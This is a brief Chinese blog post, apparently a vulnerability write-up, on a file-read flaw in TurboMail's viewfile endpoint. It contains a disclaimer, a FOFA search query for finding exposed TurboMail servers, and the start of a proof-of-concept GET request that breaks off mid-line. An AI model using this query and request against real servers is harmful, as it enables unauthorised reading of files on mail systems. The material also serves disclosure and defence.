免责声明
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责
漏洞描述
TurboMail viewfile存在文件读取漏洞
![](https://i-blog.csdnimg.cn/blog_migrate/d90e26f83c76bc9a7426dfcf9ae6dd7d.png)
fofa语句
body="maintlogin.jsp" && body="/mailmain?type=logout"
poc加检测
GET /viewfile?type&